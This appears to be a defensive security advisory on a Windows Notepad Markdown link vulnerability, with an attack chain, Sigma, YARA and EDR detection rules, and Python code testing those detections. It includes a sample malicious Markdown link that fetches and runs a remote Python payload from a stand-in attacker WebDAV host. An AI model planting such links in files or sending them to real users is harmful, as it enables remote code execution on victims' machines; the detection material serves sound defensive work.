Microsoft’s quest to modernize Notepad has backfired. The addition of Markdown support in 2025 introduced a command injection vulnerability that turns a simple text file into a remote code execution vector. One crafted link, one click, and an attacker owns your session.
CVE-2026-20841 was patched in February’s Patch Tuesday, but with multiple public PoCs and reports of exploitation attempts, defenders need to act fast.
The Vulnerability
CVE: CVE-2026-20841
CVSS: 8.8 (HIGH)
CWE: CWE-77 (Command Injection)
Affected: Windows Notepad (Microsoft Store version, not legacy notepad.exe)
Patched: February 10, 2026 (build 11.2510+)
The flaw is in how Notepad's Markdown renderer handles link targets. When it renders links in a Markdown file it neither sanitizes nor restricts the URI scheme, so an attacker can write a link whose target uses the file:/// scheme and points at a WebDAV or SMB share. Notepad hands that URI to the system's protocol handler, which fetches the remote file and runs it.

```markdown
[Click here for important update](file:///\\attacker-webdav[.]com@5005\DavWWWRoot\payload.py)
```

When a user Ctrl+Clicks that link in Notepad's Markdown preview, Windows resolves the UNC path, retrieves the file from the WebDAV server and passes it to the handler registered for its extension. There is no download prompt, and for interpreter-handled types such as .py and .jar there is no SmartScreen warning either (see Exploitation Nuances below). The payload simply runs.
Attack Chain
- Attacker crafts a malicious .md file with an embedded link
- File is delivered via email, Slack, Teams, Discord, or any other file-sharing method
- Victim opens the file in Windows Notepad
- Victim clicks the embedded link (Ctrl+Click in the Markdown preview)
- Notepad invokes the protocol handler for the file:/// URI
- System connects to the attacker-controlled WebDAV/SMB share
- Payload is fetched and executed with the victim's privileges
The beauty of this attack from an adversary’s perspective: the “weapon” is a text file. It bypasses most email attachment filters. It looks innocuous. It exploits trust in a Microsoft-signed application that’s been shipping with Windows for 40 years.
Exploitation Nuances
Security researcher tangent65536’s PoC analysis reveals some important details:
- Most dangerous payload extensions (.exe, .lnk, .vbs) still trigger Windows’ built-in security warning
- If Python or Java is installed, .py and .jar payloads execute without warning dialogs
- The vulnerability is trivial to exploit but requires that one click
This means developer workstations with Python installed are prime targets. Given that developers routinely exchange README.md files and documentation, the social engineering bar is low.
Who’s Exploiting This
As of February 12, 2026, Microsoft officially rates exploitation as “less likely” with no confirmed in-the-wild attacks. However, WinBuzzer reported attack activity on February 11, and Feedly’s threat intelligence feed marked exploitation in the wild the same day.
The disconnect between Microsoft’s assessment and field reports is notable. Seven public PoCs appeared on GitHub within 24 hours of disclosure. The exploit is trivial to weaponize. Any moderately competent threat actor can integrate this into existing phishing campaigns.
Expected threat actor interest:
- Initial access brokers seeking new entry vectors
- Ransomware affiliates looking for developer-targeted attacks
- APT groups with interest in software supply chains (developer workstations are gold)
- Commodity malware distributors
The February 2026 Patch Tuesday also fixed six actively exploited zero-days, indicating heightened adversary activity against Windows infrastructure this month.
Detection Strategies
Snort Rules
Cisco Talos released detection rules in their February update:
Snort 2: 65895-65900, 65902, 65903, 65906-65911, 65913, 65914, 65923, 65924
Snort 3: 301395-301403
Vulnerability Scanners
- Qualys: Plugin 386526
- Nessus: Plugin 298646
Sigma Rule - Notepad Making Network Connections

```yaml
title: Notepad.exe Suspicious Network Activity
id: 7e8f2a1c-4d3b-5e6f-8a9b-0c1d2e3f4a5b
status: experimental
description: Detects Notepad making outbound connections to WebDAV or SMB shares
author: Endolum Academy
date: 2026/02/12
references:
  - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    Image|endswith: '\notepad.exe'
    DestinationPort:
      - 445   # SMB
      - 139   # NetBIOS
      - 80    # WebDAV HTTP
      - 443   # WebDAV HTTPS
    Initiated: 'true'
  condition: selection
falsepositives:
  - Legitimate Notepad plugins (rare)
  - Notepad's own AI features and Store update checks, which typically use 443
level: high
```

Two caveats before you deploy this. First, the WebDAV retrieval triggered by the link is performed by the WebClient service (an svchost.exe instance) and SMB access by the kernel redirector running in the System process, so the fetch itself often will not show up as a Notepad-initiated connection in Sysmon Event ID 3. Second, a WebDAV server can listen on any port (the example link above uses 5005), so the port list narrows coverage. Treat this rule as one signal and correlate it with the process-creation rule below.
Sigma Rule - Notepad Spawning Suspicious Children

```yaml
title: Notepad.exe Spawning Suspicious Child Process
id: 3c4d5e6f-7a8b-9c0d-1e2f-3a4b5c6d7e8f
status: experimental
description: Detects Notepad spawning processes commonly associated with payload execution
author: Endolum Academy
date: 2026/02/12
references:
  - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\notepad.exe'
    Image|endswith:
      - '\python.exe'
      - '\pythonw.exe'
      - '\java.exe'
      - '\javaw.exe'
      - '\powershell.exe'
      - '\cmd.exe'
      - '\wscript.exe'
      - '\cscript.exe'
      - '\mshta.exe'
      - '\rundll32.exe'
  condition: selection
falsepositives:
  - Legitimate automation (very rare for Notepad parent)
level: critical
```
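To see what the two rules above do and do not catch, here is an added Python example, written for this page rather than taken from the page's authors or from the Sigma project, that re-implements both detections over a handful of constructed Sysmon-style events. The events, file paths and addresses are made up for the demonstration; the svchost.exe event models the WebClient service carrying the WebDAV fetch, and the port-agnostic variant that alerts on any Notepad-initiated connection to a non-private address is an assumption about what a hardened version of the first rule would look like, not something the page's rule does.

```python
import ipaddress
from typing import Iterable

# Constructed Sysmon-shaped events (Event ID 3 network_connection, Event ID 1
# process_creation). Made-up samples for the demonstration, not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "category": "network_connection",   # Notepad to a WebDAV server on a non-standard port
     "Image": r"C:\Program Files\WindowsApps\Notepad\Notepad.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 5005, "Initiated": "true"},
    {"id": 2, "category": "network_connection",   # WebClient service (svchost) doing the actual fetch
     "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 5005, "Initiated": "true"},
    {"id": 3, "category": "network_connection",   # Notepad opening a file on an internal SMB server
     "Image": r"C:\Program Files\WindowsApps\Notepad\Notepad.exe",
     "DestinationIp": "192.168.10.5", "DestinationPort": 445, "Initiated": "true"},
    {"id": 4, "category": "process_creation",     # interpreter launched for the fetched payload
     "ParentImage": r"C:\Program Files\WindowsApps\Notepad\Notepad.exe",
     "Image": r"C:\Python312\python.exe",
     "CommandLine": r'python.exe "\\203.0.113.10@5005\DavWWWRoot\payload.py"'},
    {"id": 5, "category": "process_creation",     # ordinary launch of Notepad from Explorer
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\WindowsApps\Notepad\Notepad.exe",
     "CommandLine": r"Notepad.exe README.md"},
]

# Child images from the second Sigma rule and ports from the first.
CHILD_PROCESSES = (r"\python.exe", r"\pythonw.exe", r"\java.exe", r"\javaw.exe",
                   r"\powershell.exe", r"\cmd.exe", r"\wscript.exe", r"\cscript.exe",
                   r"\mshta.exe", r"\rundll32.exe")
WEBDAV_SMB_PORTS = {445, 139, 80, 443}
# Ranges treated as internal by the port-agnostic variant (RFC 1918, loopback, link-local).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def endswith_ci(value: str, suffix: str) -> bool:
    """Sigma's endswith modifier is case-insensitive by default."""
    return value.lower().endswith(suffix.lower())


def is_internal(ip: str) -> bool:
    return any(ipaddress.ip_address(ip) in net for net in INTERNAL_NETS)


def notepad_network_by_port(ev: dict) -> bool:
    """The first Sigma rule as written: Notepad initiating a connection to a listed port."""
    return (ev["category"] == "network_connection"
            and endswith_ci(ev["Image"], r"\notepad.exe")
            and ev["Initiated"] == "true"
            and ev["DestinationPort"] in WEBDAV_SMB_PORTS)


def notepad_network_to_public(ev: dict) -> bool:
    """Port-agnostic variant (assumed hardening): any Notepad-initiated connection
    to a non-internal address, so a WebDAV server on port 5005 is not missed."""
    return (ev["category"] == "network_connection"
            and endswith_ci(ev["Image"], r"\notepad.exe")
            and ev["Initiated"] == "true"
            and not is_internal(ev["DestinationIp"]))


def notepad_suspicious_child(ev: dict) -> bool:
    """The second Sigma rule: interpreter or LOLBin spawned with Notepad as parent."""
    return (ev["category"] == "process_creation"
            and endswith_ci(ev["ParentImage"], r"\notepad.exe")
            and any(endswith_ci(ev["Image"], s) for s in CHILD_PROCESSES))


RULES = {
    "notepad_network_by_port": notepad_network_by_port,
    "notepad_network_to_public": notepad_network_to_public,
    "notepad_suspicious_child": notepad_suspicious_child,
}


def evaluate(events: Iterable[dict]) -> dict:
    """Return, per rule name, the ids of the events that match it."""
    hits = {name: [] for name in RULES}
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits[name].append(ev["id"])
    return hits


def unmatched(events: Iterable[dict]) -> list:
    """Ids of events no rule fires on: the coverage gap worth knowing about."""
    return [ev["id"] for ev in events if not any(rule(ev) for rule in RULES.values())]


if __name__ == "__main__":
    for name, ids in evaluate(SAMPLE_EVENTS).items():
        print(f"{name}: {ids}")
    print(f"unmatched: {unmatched(SAMPLE_EVENTS)}")
```

Run against the samples, the page's port-based rule fires only on the internal SMB connection (event 3) and misses the port-5005 WebDAV connection (event 1) that the port-agnostic variant catches; the svchost.exe fetch (event 2) is caught by neither, which is why the process-creation rule (event 4) is the more reliable of the two for this attack chain.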
YARA Rule - Malicious Markdown File

```yara
rule CVE_2026_20841_Malicious_Markdown {
    meta:
        description = "Detects Markdown files with suspicious WebDAV/SMB links"
        author = "Endolum Academy"
        reference = "CVE-2026-20841"
        date = "2026-02-12"
    strings:
        // [text](file:///
        $md_link = /\[.{1,100}\]\(file:\/\/\// ascii nocase
        // file:///\\host@port\   (WebDAV @port syntax)
        $webdav_pattern = /file:\/\/\/\\\\[a-zA-Z0-9\-\.]+@[0-9]+\\/ ascii nocase
        // file:///\\host\share\  (UNC share)
        $smb_pattern = /file:\/\/\/\\\\[a-zA-Z0-9\-\.]+\\[a-zA-Z0-9\-_]+\\/ ascii nocase
        $davwww = "DavWWWRoot" ascii nocase
    condition:
        $md_link and ($webdav_pattern or $smb_pattern or $davwww)
}
```
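An added Python equivalent of the YARA logic, example code for this page rather than the page's or Endolum's tooling, that extracts Markdown links and classifies their targets. It goes slightly beyond the YARA rule: it flags any link whose scheme is not http, https or mailto, since the root cause is Notepad not restricting URI schemes, and it percent-decodes each target once before matching, which is a conservative hunting choice rather than a documented Notepad behaviour. The sample Markdown and the example.net hosts in it are constructed.

```python
import re
from urllib.parse import unquote

# Inline Markdown link: [text](target). The target is captured up to the first
# whitespace, ')' or '>' so Windows-style backslashes inside it survive intact.
LINK_RE = re.compile(r"\[[^\]]{1,100}\]\(\s*<?([^\s)>]+)>?[^)]*\)")
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.I)
# Same shapes as the YARA strings: file:///\\host@port\...  and  file:///\\host\share\...
WEBDAV_RE = re.compile(r"^file:///\\\\[a-z0-9.\-]+@[0-9]+\\", re.I)
UNC_RE = re.compile(r"^file:///\\\\[a-z0-9.\-]+\\[a-z0-9_\-$]+\\", re.I)
SAFE_SCHEMES = {"http", "https", "mailto"}


def classify_link(target: str) -> list:
    """Return the reasons a link target is suspicious; an empty list means benign."""
    decoded = unquote(target)  # single decode pass (assumption): catches %5C-encoded backslashes
    reasons = []
    m = SCHEME_RE.match(decoded)
    scheme = m.group(1).lower() if m else ""   # relative links have no scheme
    if scheme == "file":
        reasons.append("file-scheme")
    elif scheme and scheme not in SAFE_SCHEMES:
        reasons.append(f"non-web-scheme:{scheme}")
    if WEBDAV_RE.match(decoded):
        reasons.append("webdav-port-syntax")
    if UNC_RE.match(decoded):
        reasons.append("unc-share")
    if "davwwwroot" in decoded.lower():
        reasons.append("davwwwroot")
    return reasons


def scan_markdown(text: str) -> list:
    """Walk every inline link in a Markdown document and report the suspicious ones."""
    findings = []
    for m in LINK_RE.finditer(text):
        target = m.group(1)
        reasons = classify_link(target)
        if reasons:
            findings.append({"target": target, "reasons": reasons})
    return findings


# Constructed sample document; hosts use the reserved example.net / example.com names.
SAMPLE_MD = r"""
# Release notes
See the [changelog](https://example.com/changelog) and the [docs](./docs/index.md).
[Click here for important update](file:///\\files.example.net@5005\DavWWWRoot\payload.py)
[Installer](file:///\\fileserver.example.net\public\setup.jar)
[Same link, percent-encoded](file:///%5C%5Cfiles.example.net@5005%5CDavWWWRoot%5Cpayload.py)
Questions: [security team](mailto:security@example.com)
"""

if __name__ == "__main__":
    for finding in scan_markdown(SAMPLE_MD):
        print(f"{', '.join(finding['reasons']):45} {finding['target']}")
```

On the sample, the two web links and the relative link pass, the WebDAV link is reported for its scheme, its @port syntax and the DavWWWRoot marker, the UNC link for its scheme and share path, and the percent-encoded copy is caught even though the raw bytes would not match the YARA regexes.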
Network IOCs to Monitor
Watch for Notepad.exe, and for the svchost.exe instance hosting the WebClient service and the System process that actually carry WebDAV and SMB traffic on its behalf, connecting to:
- External IP addresses on ports 80, 443, 445 or 139, and on arbitrary ports when the link uses WebDAV @port syntax (the example above uses 5005)
- WebDAV URLs with @port syntax (e.g., attacker[.]com@5005)
- UNC paths to external hosts
- Any URL containing "DavWWWRoot" in the path
EDR Queries

Microsoft Defender for Endpoint (KQL):

```kql
// Notepad-initiated connections to public addresses on the usual SMB/WebDAV ports.
// Drop the RemotePort filter to also catch WebDAV servers on non-standard ports.
DeviceNetworkEvents
| where InitiatingProcessFileName =~ "notepad.exe"
| where RemotePort in (80, 443, 445, 139)
| where RemoteIPType == "Public"
| project Timestamp, DeviceName, RemoteIP, RemotePort, RemoteUrl
```

CrowdStrike Falcon (Event Search):

```spl
event_platform=Win event_simpleName=ProcessRollup2 ParentBaseFileName="notepad.exe"
| search FileName IN ("python.exe", "pythonw.exe", "java.exe", "javaw.exe", "powershell.exe", "cmd.exe")
| table _time, ComputerName, ParentBaseFileName, FileName, CommandLine
```
Immediate Actions
- Patch Now - Update Windows Notepad via the Microsoft Store to build 11.2510 or later, and verify the installed version of the Microsoft.WindowsNotepad package rather than assuming the Store has already done it
- Enable Auto-Updates - Ensure Microsoft Store apps update automatically
- Email Gateway - Consider blocking or quarantining .md attachments temporarily
- User Awareness - Warn users about clicking links in Markdown files
- Monitor - Deploy the Sigma rules above and hunt for historical activity
The Bigger Picture
CVE-2026-20841 is a symptom of Microsoft’s aggressive feature expansion without proportional security review. Notepad went from a 40KB text editor to a network-connected, AI-integrated productivity tool. Every new feature is new attack surface.
This vulnerability also highlights the trust problem with inbox apps. Users inherently trust applications signed by Microsoft and shipping with Windows. That trust is being weaponized.
The irony isn’t lost on anyone that this disclosure came days after Notepad++ revealed their update infrastructure was compromised by Chinese state-sponsored actors for months in 2025. Text editors are having a rough year.
Want to learn how to hunt for threats like this? Check out Endolum Academy’s ECDA (Endolum Certified Defense Analyst) certification, where we teach real-world detection engineering and threat hunting techniques.